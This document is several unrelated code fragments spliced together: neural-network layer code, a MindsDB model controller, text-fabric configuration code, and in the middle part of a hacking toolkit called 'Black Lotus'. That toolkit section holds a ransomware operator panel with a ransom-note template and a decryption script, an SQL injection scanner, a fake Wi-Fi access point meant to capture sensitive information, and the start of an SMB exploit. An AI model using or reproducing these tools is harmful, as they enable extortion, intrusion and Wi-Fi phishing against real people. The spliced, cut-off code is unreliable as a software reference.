model.add(Conv2d(n_filters=32, width=1, height=1, stride=1,
act='identity', include_bias=False))
branch_pool = BN(act='relu')
model.add(branch_pool)
# mixed0 concat
concat = Concat(act='identity',
src_layers=[branch1x1, branch5x5, branch3x3dbl,
branch_pool])
model.add(concat)
# mixed 1: output 35 x 35 x 288
# branch1x1
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
branch1x1 = BN(act='relu')
model.add(branch1x1)
# branch5x5
model.add(Conv2d(n_filters=48, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=64, width=5, height=5, stride=1,
act='identity', include_bias=False))
branch5x5 = BN(act='relu')
model.add(branch5x5)
# branch3x3dbl
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, | |
import os
import sys
import time
import json
import base64
import psutil
import datetime
from copy import deepcopy
from contextlib import contextmanager
from dateutil.parser import parse as parse_datetime
from typing import Optional, Tuple, Union, Dict, Any
import requests
from typing import List
import lightwood
from lightwood.api.types import ProblemDefinition
from lightwood import __version__ as lightwood_version
import numpy as np
import pandas as pd
from pandas.core.frame import DataFrame
import mindsdb_datasources
from mindsdb import __version__ as mindsdb_version
import mindsdb.interfaces.storage.db as db
from mindsdb.utilities.functions import mark_process
from mindsdb.utilities.json_encoder import json_serialiser
from mindsdb.utilities.config import Config
from mindsdb.interfaces.storage.fs import FsStore
from mindsdb.utilities.log import log
from mindsdb.interfaces.model.learn_process import LearnProcess, GenerateProcess, FitProcess, UpdateProcess, LearnRemoteProcess
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.datastore.datastore import QueryDS
from mindsdb.utilities.hooks import after_predict as after_predict_hook
IS_PY36 = sys.version_info[1] <= 6
class ModelController():
config: Config
fs_store: FsStore
predictor_cache: Dict[str, Dict[str, Union[Any]]]
ray_based: bool
def __init__(self, ray_based: bool) -> None:
self.config = Config()
self.fs_store = FsStore()
self.predictor_cache = {}
self.ray_based = ray_based
def _invalidate_cached_predictors(self) -> None:
# @TODO: Cache will become stale if the respective ModelInterface is not invoked yet a bunch of predictors remained cached, no matter where we invoke it. In practice shouldn't be a big issue though
for predictor_name in list(self.predictor_cache.keys()):
if (datetime.datetime.now() - self.predictor_cache[predictor_name]['created']).total_seconds() > 1200:
del self.predictor_cache[predictor_name]
def _lock_predictor(self, id: int, mode: str) -> None:
from mindsdb.interfaces.storage.db import session, Semaphor
while True:
semaphor_record = session.query(Semaphor).filter_by(entity_id=id, entity_type='predictor').first()
if semaphor_record is not None:
if mode == 'read' and semaphor_record.action == 'read':
return True
try:
semaphor_record = Semaphor(entity_id=id, entity_type='predictor', action=mode)
session.add(semaphor_record)
session.commit()
return True
except Exception:
pass
time.sleep(1)
def _unlock_predictor(self, id: int) -> None:
from mindsdb.interfaces.storage.db import session, Semaphor
semaphor_record = session.query(Semaphor).filter_by(entity_id=id, entity_type='predictor').first()
if semaphor_record is not None:
session.delete(semaphor_record)
session.commit()
@contextmanager
def _lock_context(self, id, mode: str):
try:
self._lock_predictor(id, mode)
yield True
finally:
self._unlock_predictor(id)
def _get_from_data_df(self, from_data: dict) -> DataFrame:
if from_data['class'] == 'QueryDS':
ds = QueryDS(*from_data['args'], **from_data['kwargs'])
else:
ds_cls = getattr(mindsdb_datasources, from_data['class'])
ds = ds_cls(*from_data['args'], **from_data['kwargs'])
return ds.df
def _unpack_old_args(
self, from_data: dict, kwargs: dict, to_predict: Optional[Union[str, list]] = None
) -> Tuple[pd.DataFrame, ProblemDefinition, bool]:
problem_definition = kwargs or {}
if isinstance(to_predict, str):
problem_definition['target'] = to_predict
elif isinstance(to_predict, list) and len(to_predict) == 1:
problem_definition['target'] = to_predict[0]
elif problem_definition.get('target') is None:
raise Exception(
f"Predict target must be 'str' or 'list' with 1 element. Got: {to_predict}"
)
while '.' in str(list(kwargs.keys())):
for k in list(kwargs.keys()):
if '.' in k:
nks = k.split('.')
obj = kwargs
for nk in nks[:-1]:
if nk not in obj:
obj[nk] = {}
obj = obj[nk]
obj[nks[-1]] = kwargs[k]
del kwargs[k]
join_learn_process = kwargs.get('join_learn_process', False)
if 'join_learn_process' in kwargs:
del kwargs['join_learn_process']
# Adapt kwargs to problem definition
if 'timeseries_settings' in kwargs:
problem_definition['timeseries_settings'] = kwargs['timeseries_settings']
if 'stop_training_in_x_seconds' in kwargs:
problem_definition['time_aim'] = kwargs['stop_training_in_x_seconds']
if kwargs.get('ignore_columns') is not None:
problem_definition['ignore_features'] = kwargs['ignore_columns']
json_ai_override = {}
json_ai_keys = list(lightwood.JsonAI.__dict__['__annotations__'].keys())
for k in kwargs:
if k in json_ai_keys:
json_ai_override[k] = kwargs[k]
if (
problem_definition.get('ignore_features') is not None and isinstance(problem_definition['ignore_features'], list) is False
):
problem_definition['ignore_features'] = [problem_definition['ignore_features']]
if from_data is not None:
df = self._get_from_data_df(from_data)
else:
df = None
return df, problem_definition, join_learn_process, json_ai_override
@mark_process(name='learn')
def learn(self, name: str, from_data: dict, to_predict: str, dataset_id: int, kwargs: dict,
company_id: int, delete_ds_on_fail: Optional[bool] = False, user_class=0) -> None:
predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=name).first()
if predictor_record is not None:
raise Exception('Predictor name must be unique.')
df, problem_definition, join_learn_process, json_ai_override = self._unpack_old_args(from_data, kwargs, to_predict)
is_cloud = self.config.get('cloud', False)
if is_cloud is True:
models = self.get_models(company_id)
count = 0
for model in models:
if model.get('status') in ['generating', 'training']:
created_at = model.get('created_at')
if isinstance(created_at, str):
created_at = parse_datetime(created_at)
if isinstance(model.get('created_at'), datetime.datetime) is False:
continue
if (datetime.datetime.now() - created_at) < datetime.timedelta(hours=1):
count += 1
if count == 2:
raise Exception('You can train no more than 2 models at the same time')
if user_class != 1 and len(df) > 10000:
raise Exception('Datasets are limited to 10,000 rows on free accounts')
if 'url' in problem_definition:
train_url = problem_definition['url'].get('train', None)
predict_url = problem_definition['url'].get('predict', None)
com_format = problem_definition['format']
api_token = problem_definition['API_TOKEN'] if ('API_TOKEN' in problem_definition) else None
input_column = problem_definition['input_column'] if ('input_column' in problem_definition) else None
predictor_record = db.Predictor(
company_id=company_id,
name=name,
dataset_id=dataset_id,
mindsdb_version=mindsdb_version,
lightwood_version=lightwood_version,
to_predict=problem_definition['target'],
learn_args=ProblemDefinition.from_dict(problem_definition).to_dict(),
data={'name': name, 'train_url': train_url, 'predict_url': predict_url, 'format': com_format,
'status': 'complete' if train_url is None else 'training', 'API_TOKEN': api_token, 'input_column': input_column},
is_custom=True,
# @TODO: For testing purposes, remove afterwards!
dtype_dict=json_ai_override['dtype_dict'],
)
db.session.add(predictor_record)
db.session.commit()
if train_url is not None:
p = LearnRemoteProcess(df, predictor_record.id)
p.start()
if join_learn_process:
p.join()
if not IS_PY36:
p.close()
db.session.refresh(predictor_record)
return
problem_definition = ProblemDefinition.from_dict(problem_definition)
predictor_record = db.Predictor(
company_id=company_id,
name=name,
dataset_id=dataset_id,
mindsdb_version=mindsdb_version,
lightwood_version=lightwood_version,
to_predict=problem_definition.target,
learn_args=problem_definition.to_dict(),
data={'name': name},
)
db.session.add(predictor_record)
db.session.commit()
predictor_id = predictor_record.id
p = LearnProcess(df, problem_definition, predictor_id, delete_ds_on_fail, json_ai_override)
p.start()
if join_learn_process:
p.join()
if not IS_PY36:
p.close()
db.session.refresh(predictor_record)
@mark_process(name='predict')
def predict(self, name: str, when_data: Union[dict, list, pd.DataFrame], pred_format: str, company_id: int):
original_name = name
name = f'{company_id}@@@@@{name}'
predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=original_name).first()
assert predictor_record is not None
predictor_data = self.get_model_data(name, company_id)
if isinstance(when_data, dict) and 'kwargs' in when_data and 'args' in when_data:
ds_cls = getattr(mindsdb_datasources, when_data['class'])
df = ds_cls(*when_data['args'], **when_data['kwargs']).df
else:
if isinstance(when_data, dict):
when_data = [when_data]
df = pd.DataFrame(when_data)
if predictor_record.is_custom:
if predictor_data['format'] == 'mlflow':
resp = requests.post(predictor_data['predict_url'],
data=df.to_json(orient='records'),
headers={'content-type': 'application/json; format=pandas-records'})
answer: List[object] = resp.json()
predictions = pd.DataFrame({
'prediction': answer
})
elif predictor_data['format'] == 'huggingface':
headers = {"Authorization": "Bearer {API_TOKEN}".format(API_TOKEN=predictor_data['API_TOKEN'])}
col_data = df[predictor_data['input_column']]
col_data.rename({predictor_data['input_column']: 'inputs'}, axis='columns')
serialized_df = json.dumps(col_data.to_dict())
resp = requests.post(predictor_data['predict_url'], headers=headers, data=serialized_df)
predictions = pd.DataFrame(resp.json())
elif predictor_data['format'] == 'ray_server':
serialized_df = json.dumps(df.to_dict())
resp = requests.post(predictor_data['predict_url'], json={'df': serialized_df})
predictions = pd.DataFrame(resp.json())
else:
fs_name = f'predictor_{company_id}_{predictor_record.id}'
if (
name in self.predictor_cache
and self.predictor_cache[name]['updated_at'] != predictor_record.updated_at
):
del self.predictor_cache[name]
if name not in self.predictor_cache:
# Clear the cache entirely if we have less than 1.2 GB left
if psutil.virtual_memory().available < 1.2 * pow(10, 9):
self.predictor_cache = {}
if predictor_data['status'] == 'complete':
self.fs_store.get(fs_name, fs_name, self.config['paths']['predictors'])
self.predictor_cache[name] = {
'predictor': lightwood.predictor_from_state(
os.path.join(self.config['paths']['predictors'], fs_name),
predictor_record.code
),
'updated_at': predictor_record.updated_at,
'created': datetime.datetime.now(),
'code': predictor_record.code,
'pickle': str(os.path.join(self.config['paths']['predictors'], fs_name))
}
else:
raise Exception(
f'Trying to predict using predictor {original_name} with status: {predictor_data["status"]}. Error is: {predictor_data.get("error", "unknown")}'
)
predictions = self.predictor_cache[name]['predictor'].predict(df)
# Bellow is useful for debugging caching and storage issues
# del self.predictor_cache[name]
predictions = predictions.to_dict(orient='records')
after_predict_hook(
company_id=company_id,
predictor_id=predictor_record.id,
rows_in_count=df.shape[0],
columns_in_count=df.shape[1],
rows_out_count=len(predictions)
)
target = predictor_record.to_predict[0]
if pred_format in ('explain', 'dict', 'dict&explain'):
explain_arr = []
dict_arr = []
for i, row in enumerate(predictions):
obj = {
target: {
'predicted_value': row['prediction'],
'confidence': row.get('confidence', None),
'anomaly': row.get('anomaly', None),
'truth': row.get('truth', None)
}
}
if 'lower' in row:
obj[target]['confidence_lower_bound'] = row.get('lower', None)
obj[target]['confidence_upper_bound'] = row.get('upper', None)
explain_arr.append(obj)
td = {'predicted_value': row['prediction']}
for col in df.columns:
if col in row:
td[col] = row[col]
elif f'order_{col}' in row:
td[col] = row[f'order_{col}']
elif f'group_{col}' in row:
td[col] = row[f'group_{col}']
else:
orginal_index = row.get('original_index')
if orginal_index is None:
log.warning('original_index is None')
orginal_index = i
td[col] = df.iloc[orginal_index][col]
dict_arr.append({target: td})
if pred_format == 'explain':
return explain_arr
elif pred_format == 'dict':
return dict_arr
elif pred_format == 'dict&explain':
return dict_arr, explain_arr
# New format -- Try switching to this in 2-3 months for speed, for now above is ok
else:
return predictions
@mark_process(name='analyse')
def analyse_dataset(self, ds: dict, company_id: int) -> lightwood.DataAnalysis:
ds_cls = getattr(mindsdb_datasources, ds['class'])
df = ds_cls(*ds['args'], **ds['kwargs']).df
analysis = lightwood.analyze_dataset(df)
return analysis.to_dict() # type: ignore
def get_model_data(self, name, company_id: int):
if '@@@@@' in name:
sn = name.split('@@@@@')
assert len(sn) < 3 # security
name = sn[1]
original_name = name
name = f'{company_id}@@@@@{name}'
predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=original_name).first()
if predictor_record is None:
raise Exception(f"Model does not exists: {original_name}")
linked_dataset = db.session.query(db.Dataset).get(predictor_record.dataset_id)
data = deepcopy(predictor_record.data)
data['dtype_dict'] = predictor_record.dtype_dict
data['created_at'] = str(parse_datetime(str(predictor_record.created_at).split('.')[0]))
data['updated_at'] = str(parse_datetime(str(predictor_record.updated_at).split('.')[0]))
data['predict'] = predictor_record.to_predict[0]
data['update'] = predictor_record.update_status
data['mindsdb_version'] = predictor_record.mindsdb_version
data['name'] = predictor_record.name
data['code'] = predictor_record.code
data['json_ai'] = predictor_record.json_ai
data['data_source_name'] = linked_dataset.name if linked_dataset else None
data['problem_definition'] = predictor_record.learn_args
# assume older models are complete, only temporary
if 'status' in predictor_record.data:
data['status'] = predictor_record.data['status']
elif 'error' in predictor_record.data:
data['status'] = 'error'
elif predictor_record.update_status == 'available':
data['status'] = 'complete'
elif predictor_record.json_ai is None and predictor_record.code is None:
data['status'] = 'generating'
elif predictor_record.data is None:
data['status'] = 'editable'
elif 'training_log' in predictor_record.data:
data['status'] = 'training'
elif 'error' not in predictor_record.data:
data['status'] = 'complete'
else:
data['status'] = 'error'
if data.get('accuracies', None) is not None:
if | |
cap.isOpened():
raise IOError("Cannot open webcam")
while True:
ret, frame = cap.read()
frame = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)
cv2.imshow('Black Lotus camera', frame)
c = cv2.waitKey(1)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
#----------------------------------------------------------------------------------------------------------------------
def ransomware_instructions():
os.system("cls || clear")
print("""
\033[31mRansomware instructions Panel\033[37m
The infected file is called '\033[31mransomware.py\033[37m'
It's located in the same folder of Black Lotus
1) Open The file and edit the enemy file you want to encrypt
2) Under the '\033[33mATTACK MESSAGE\033[37m' section you have 3 options:
|_1) Change the txt file name ( Default = 'YOU_ARE_FUCKED')
|_\033[31mDONT CHANGE THE FILE TYPE \033[37m( DEFAULT '.txt')
|_2) Change the contact form with an email of your choice
|_3) Change the email name if you want( Default = 'HELP ME')
To Undo the encryption run this script (only the yellow code) :
---------------------------------------------------------- """)
print("\033[33m")
print("""
#!/usr/bin/python
# Ransomware Antidote By The Jes7er
import os
try:
from Crypto.Cipher import XOR
except:
os.system('pip install pycrypto')
import base64
import sys
key = 'matrix'
cipher = XOR.new(key)
pathfile = 'THE FILE YOU WANT TO DECRYPT'
openfile = open(pathfile, 'rb')
readfile = openfile.read()
openfile.close()
encoding = cipher.decrypt(base64.b64decode(readfile))
os.system('rm '+ pathfile)
openfile2 = open(pathfile,'wb')
openfile2.write(encoding)
openfile2.close()
""")
print("""\033[37m------------------------------------------------------------
save this file after the modification as '\033[32mdecryption.py\033[37m'
run it by typing '\033[31mpython3 decryption.py\033[37m'
\n\033[31mREAD FROM THE BEGINNING ^ \033[37m""")
#----------------------------------------------------------------------------------------------------------------------
def updatesystem():
import os
print("\033[31mBlack Lotus is doing some updates for you")
print("This may take a while.. Grab a coffee\033[37m ")
os.system("sudo apt-get update -y && sudo apt-get upgrade -y")
#----------------------------------------------------------------------------------------------------------------------
def meg_sql_scan():
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
from pprint import pprint
logo = ("""\033[37m
[ \033[31mBlack Lotus SQL Injection Scanner\033[37m ]
|
|_________|--------=-----------.
|_________|| | | |=| \033[33m ////////\033[37m |%%========-\033[37m
| |--------=-----------`
|
""")
# initialize an HTTP session & set the browser
s = requests.Session()
s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
def get_all_forms(url):
"""Given a `url`, it returns all forms from the HTML content"""
soup = bs(s.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""
This function extracts all possible useful information about an HTML `form`
"""
details = {}
# get the form action (target url)
try:
action = form.attrs.get("action").lower()
except:
action = None
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
input_value = input_tag.attrs.get("value", "")
inputs.append({"type": input_type, "name": input_name, "value": input_value})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def is_vulnerable(response):
"""A simple boolean function that determines whether a page
is SQL Injection vulnerable from its `response`"""
errors = {
# MySQL
"you have an error in your sql syntax;",
"warning: mysql",
# SQL Server
"unclosed quotation mark after the character string",
# Oracle
"quoted string not properly terminated",
}
for error in errors:
# if you find one of these errors, return True
if error in response.content.decode().lower():
return True
# no error detected
return False
def scan_sql_injection(url):
# test on URL
for c in "\"'":
# add quote/double quote character to the URL
new_url = f"{url}{c}"
print("[\033[33m!\033[37m] Trying", new_url)
# make the HTTP request
res = s.get(new_url)
if is_vulnerable(res):
# SQL Injection detected on the URL itself,
# no need to preceed for extracting forms and submitting them
print("[\033[31m+\033[37m] SQL Injection vulnerability detected, link:", new_url)
return
# test on HTML forms
forms = get_all_forms(url)
print(f"[\033[31m+\033[37m] Detected {len(forms)} forms on {url}.")
for form in forms:
form_details = get_form_details(form)
for c in "\"'":
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
if input_tag["type"] == "hidden" or input_tag["value"]:
# any input form that is hidden or has some value,
# just use it in the form body
try:
data[input_tag["name"]] = input_tag["value"] + c
except:
pass
elif input_tag["type"] != "submit":
# all others except submit, use some junk data with special character
data[input_tag["name"]] = f"test{c}"
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
if form_details["method"] == "post":
res = s.post(url, data=data)
elif form_details["method"] == "get":
res = s.get(url, params=data)
# test whether the resulting page is vulnerable
if is_vulnerable(res):
print("[\033[31m+\033[37m] SQL Injection vulnerability detected, link: ", url)
print("[\033[31m+\033[37m] Form:")
pprint(form_details)
break
if __name__ == "__main__":
print(logo)
url = input("Enter URL > ")
#http://testphp.vulnweb.com/artists.php?artist=1
scan_sql_injection(url)
#----------------------------------------------------------------------------------------------------------------------
def cve_search():
cve = input("Enter cve name \033[5;31m|> \033[0;37m")
url = 'https://cve.mitre.org/cgi-bin/cvename.cgi?name='
url = str(url + cve)
print("\033[37mVisit this url to get complete information > \033[31m", url, "\033[37m")
#----------------------------------------------------------------------------------------------------------------------
def steganography_meg():
import cv2
import numpy as np
def to_bin(data):
"""Convert `data` to binary format as string"""
if isinstance(data, str):
return ''.join([ format(ord(i), "08b") for i in data ])
elif isinstance(data, bytes) or isinstance(data, np.ndarray):
return [ format(i, "08b") for i in data ]
elif isinstance(data, int) or isinstance(data, np.uint8):
return format(data, "08b")
else:
raise TypeError("Type not supported.")
def encode(image_name, secret_data):
# read the image
image = cv2.imread(image_name)
# maximum bytes to encode
n_bytes = image.shape[0] * image.shape[1] * 3 // 8
print("[*] Maximum bytes to encode:", n_bytes)
if len(secret_data) > n_bytes:
raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
print("[*] Encoding data...")
# add stopping criteria
secret_data += "====="
data_index = 0
# convert data to binary
binary_secret_data = to_bin(secret_data)
# size of data to hide
data_len = len(binary_secret_data)
for row in image:
for pixel in row:
# convert RGB values to binary format
r, g, b = to_bin(pixel)
# modify the least significant bit only if there is still data to store
if data_index < data_len:
# least significant red pixel bit
pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant green pixel bit
pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant blue pixel bit
pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
data_index += 1
# if data is encoded, just break out of the loop
if data_index >= data_len:
break
return image
def decode(image_name):
print("[+] Decoding...")
# read the image
image = cv2.imread(image_name)
binary_data = ""
for row in image:
for pixel in row:
r, g, b = to_bin(pixel)
binary_data += r[-1]
binary_data += g[-1]
binary_data += b[-1]
# split by 8-bits
all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
# convert from bits to characters
decoded_data = ""
for byte in all_bytes:
decoded_data += chr(int(byte, 2))
if decoded_data[-5:] == "=====":
break
return decoded_data[:-5]
if __name__ == "__main__":
input_image = input("Enter Image path > ")
output_image = input("Enter Output path > ")
secret_data = input("Enter Message to hidde > ")
# encode the data into the image
encoded_image = encode(image_name=input_image, secret_data=secret_data)
# save the output image (encoded image)
cv2.imwrite(output_image, encoded_image)
# decode the secret data from the image
decoded_data = decode(output_image)
print("[+] Decoded data:", decoded_data)
#----------------------------------------------------------------------------------------------------------------------
def fake_wifi_access_point():
#sudo apt-get install aircrack-ng
import os
os.system('cls||clear')
print("""\033[37m
.&&&&&@&&&&&&&&&&&&&@&&&&%
@@@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&@@
@&&&&&&&&&&&&&&&&&&@@&&&&&&&&&&&&&&&&&&&&&&&&@@@%
%&&&&&&&&&&@&&# .&&@&&&&&&&&&&&/
&@&&&&&&&@&@ .&&&&&&&&&&&#
@&&&&&&&@ (@@&&&&&&&@@/ &&&&&&&&*
&&& %&@&&&&&&&&&&&&&&&&&&&&&&&@&/ &@&
,&@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&@&@
%&&&&&&&&&&&@@. *@&&&&&&&&&&&@(
&@&&&&&&/ &&&&&&&&&
@@@ &@%
#&&&&&&&&&&&&&&&@@/
%&&&&&&&&&&&&&&&&&&&&&&&&&*
@&&&&&&@@@/ (@&&@&&&&@#
*&& && \033[31mBlack Lotus Fake Wifi Access Point\033[37m
Capture sensitive information
@&&&&&&&&&@
&&&&&&&
@&&
""")
os.system("sudo airmon-ng check kill")
os.system("sudo airmon-ng")
print("Choose an interface ^ ")
iface = input("Enter interface name \033[36m>\033[37m ")
os.system("sudo airmon-ng start " + str(iface))
sender_mac = RandMAC()
ssid = input("Enter the fake wifi name \033[36m>\033[37m ")
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac)
beacon = Dot11Beacon()
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, iface=iface, loop=1)
#----------------------------------------------------------------------------------------------------------------------
def google_maps():
try:
from pygeocoder import Geocoder
except:
os.system("sudo pip3 install pygeocoder")
from pygeocoder import Geocoder
print("You need an API key, to get one go here http://g.co/dev/maps-no-account")
business_name = input("Enter name or location \033[31m>\033[37m ")
print("Searching %s" %business_name)
results = Geocoder.geocode(business_name)
for result in results:
print(result)
#----------------------------------------------------------------------------------------------------------------------
def photo_ai():
print("\033[37mArtificial Intelligence face scanner")
print("Search all over the web to find persons face")
print("Link \033[31m>\033[33m https://pimeyes.com/en \033[37m")
#----------------------------------------------------------------------------------------------------------------------
def reaper():
import os
from datetime import datetime
import time
smb_scan = True
os.system('cls||clear')
print("""\033[31m Black Lotus SMB Exploit | |
specs["repo"]
graphicsRelative = specs["graphicsRelative"]
graphicsModule = [(org, repo, graphicsRelative)] if graphicsRelative else []
specs["zip"] = (
[repo]
+ [(m["org"], m["repo"], m["relative"],) for m in moduleSpecs]
+ graphicsModule
)
for (dKey, method) in (
("dataDisplay", getDataDefaults),
("typeDisplay", getTypeDefaults),
):
method(app, cfg, dKey, False)
app.context = AppCurrent(specs)
def setAppSpecsApi(app, cfg):
api = app.api
T = api.T
specs = app.specs
for (dKey, method) in (
("dataDisplay", getDataDefaults),
("typeDisplay", getTypeDefaults),
):
method(app, cfg, dKey, True)
specs["textFormat"] = T.defaultFormat
dKey = "interfaceDefaults"
interfaceDefaults = {inf[0]: inf[1] for inf in INTERFACE_OPTIONS}
dSource = cfg.get(dKey, {})
specific = {"lineNumbers", "showGraphics"}
allowed = {}
for (k, v) in interfaceDefaults.items():
allow = (
(
k == "lineNumbers"
and specs["lineNumberFeature"]
or k == "showGraphics"
and specs["hasGraphics"]
)
if k in specific
else True
)
if k in dSource:
val = dSource[k]
default = val if allow else None
else:
default = v if allow else None
interfaceDefaults[k] = default
allowed[k] = allow
checker = Check(app, True)
checker.checkGroup(cfg, interfaceDefaults, dKey, extra=allowed)
checker.report()
specs[dKey] = interfaceDefaults
app.context.update(specs)
app.showContext = types.MethodType(showContext, app)
def getDataDefaults(app, cfg, dKey, withApi):
checker = Check(app, withApi)
if withApi:
api = app.api
F = api.F
T = api.T
sectionTypes = T.sectionTypes
specs = app.specs
givenInfo = cfg.get(dKey, {})
if withApi:
formatStyle = {f[0]: f[1] for f in FORMAT_CLS}
formatStyle[ORIG] = specs["defaultClsOrig"]
specs["formatStyle"] = formatStyle
legalKeys = {d[0] for d in DATA_DISPLAY_DEFAULTS}
checker.checkGroup(cfg, legalKeys, dKey)
checker.report()
for (attr, default, needsApi) in DATA_DISPLAY_DEFAULTS:
if needsApi and not withApi or not needsApi and withApi:
continue
if attr == "browseNavLevel":
default = len(sectionTypes) - 1 if sectionTypes else 1
value = givenInfo.get(attr, specs.get(attr, default))
if attr in specs and attr not in givenInfo:
continue
elif attr == "exampleSection":
if not value:
if sectionTypes:
verseType = sectionTypes[-1]
firstVerse = F.otype.s(verseType)[0]
value = app.sectionStrFromNode(firstVerse)
else:
value = "passage"
specs["exampleSection"] = value
specs["exampleSectionHtml"] = f"<code>{value}</code>"
if attr == "textFormats":
methods = {fmt: v[METHOD] for (fmt, v) in value.items() if METHOD in v}
styles = {fmt: v.get(STYLE, None) for (fmt, v) in value.items()}
specs["formatMethod"] = methods
specs["formatHtml"] = {T.splitFormat(fmt)[1] for fmt in methods}
compileFormatCls(app, specs, styles)
else:
specs[attr] = value
def getTypeDefaults(app, cfg, dKey, withApi):
if not withApi:
return
checker = Check(app, withApi)
givenInfo = cfg.get(dKey, {})
customMethods = app.customMethods
api = app.api
F = api.F
T = api.T
N = api.N
otypeRank = N.otypeRank
slotType = F.otype.slotType
nTypes = F.otype.all
structureTypes = T.structureTypes
structureTypeSet = T.structureTypeSet
sectionTypes = T.sectionTypes
sectionTypeSet = T.sectionTypeSet
sectionalTypeSet = sectionTypeSet | structureTypeSet
specs = app.specs
featuresBare = {}
features = {}
lineNumberFeature = {}
hasGraphics = set()
verseTypes = {sectionTypes[-1]} if sectionTypes else set()
bigTypes = set()
verseRank = otypeRank[sectionTypes[-1]] if sectionTypes else None
lexMap = {}
baseTypes = set()
hiddenTypes = set()
condenseType = None
templates = {}
labels = {}
styles = {}
givenLevels = {}
levels = {}
children = {}
childType = {}
exclusions = {}
transform = {}
customMethods.set("transform", transform)
formatStyle = specs["formatStyle"]
for nType in nTypes:
template = (
True if nType == slotType or nType in sectionalTypeSet - verseTypes else ""
)
for dest in (templates, labels):
dest[nType] = (template, ())
unknownTypes = {nType for nType in givenInfo if nType not in nTypes}
if unknownTypes:
unknownTypesRep = ",".join(sorted(unknownTypes))
console(f"App config error(s) in typeDisplay: {unknownTypesRep}", error=True)
for (nType, info) in givenInfo.items():
checker.checkGroup(
givenInfo,
TYPE_KEYS,
nType,
postpone={
"base",
"label",
"template",
"features",
"featuresBare",
"transform",
},
)
checker.report()
if info.get("verselike", False):
verseTypes.add(nType)
lOcc = info.get("lexOcc", None)
if lOcc is not None:
lexMap[lOcc] = nType
if "base" in info:
base = info["base"]
checker.checkSetting("base", base)
baseTypes.add(nType)
if "condense" in info:
condenseType = nType
trans = info.get("transform", None)
if trans is not None:
resolvedTrans = {}
for (feat, func) in trans.items():
methodName = f"transform_{func}"
resolvedTrans[feat] = getattr(app, methodName, methodName)
v = resolvedTrans
checker.checkSetting("transform", trans, extra=v)
transform[nType] = v
for (k, dest) in (("template", templates), ("label", labels)):
if k in info:
template = info[k]
templateFeatures = (
VAR_PATTERN.findall(template) if type(template) is str else ()
)
dest[nType] = (template, templateFeatures)
checker.checkSetting(
k, template, extra=(template, templateFeatures),
)
if "style" in info:
style = info["style"]
styles[nType] = formatStyle.get(style, style)
for k in ("featuresBare", "features"):
v = info.get(k, "")
parsedV = parseFeatures(v)
checker.checkSetting(k, v, extra=parsedV)
if k == "features":
features[nType] = parsedV
else:
featuresBare[nType] = parsedV
lineNumber = info.get("lineNumber", None)
if lineNumber is not None:
lineNumberFeature[nType] = lineNumber
graphics = info.get("graphics", False)
if graphics:
hasGraphics.add(nType)
hidden = info.get("hidden", None)
if hidden:
hiddenTypes.add(nType)
verselike = info.get("verselike", False)
if verselike:
verseTypes.add(nType)
if "children" in info:
childs = info["children"] or ()
if type(childs) is str:
childs = {childs}
else:
childs = set(childs)
children[nType] = set(childs or ())
isBig = info.get("isBig", False)
if isBig:
bigTypes.add(nType)
if "level" in info or "flow" in info or "wrap" in info or "stretch" in info:
givenLevels[nType] = {
k: v for (k, v) in info.items() if k in LEVEL_DEFAULTS
}
if "exclude" in info:
exclusions[nType] = info["exclude"] or {}
checker.report()
lexTypes = set(lexMap.values())
nTypesNoLex = [n for n in nTypes if n not in lexTypes]
specs["allowedValues"] = dict(
baseTypes=tuple(e for e in nTypesNoLex if e not in sectionTypeSet),
condenseType=tuple(nTypesNoLex[0:-1]),
hiddenTypes=tuple(e for e in nTypesNoLex[0:-1] if e not in sectionTypeSet),
)
levelTypes = [set(), set(), set(), set(), set()]
levelTypes[4] = sectionalTypeSet - verseTypes
levelTypes[3] = verseTypes
levelTypes[0] = {slotType} | lexTypes
remainingTypeSet = set(nTypes) - levelTypes[4] - levelTypes[3] - levelTypes[0]
remainingTypes = tuple(x for x in nTypes if x in remainingTypeSet)
nRemaining = len(remainingTypes)
if nRemaining == 0:
midType = slotType
elif nRemaining == 1:
midType = remainingTypes[0]
levelTypes[1] = {midType}
else:
mid = len(remainingTypes) // 2
midType = remainingTypes[mid]
levelTypes[2] = set(remainingTypes[0:mid])
levelTypes[1] = set(remainingTypes[mid:])
childType = {
nType: {nTypesNoLex[i + 1]}
for (i, nType) in enumerate(nTypesNoLex)
if i < len(nTypesNoLex) - 1
# if nType in levelTypes[2] | levelTypes[1]
}
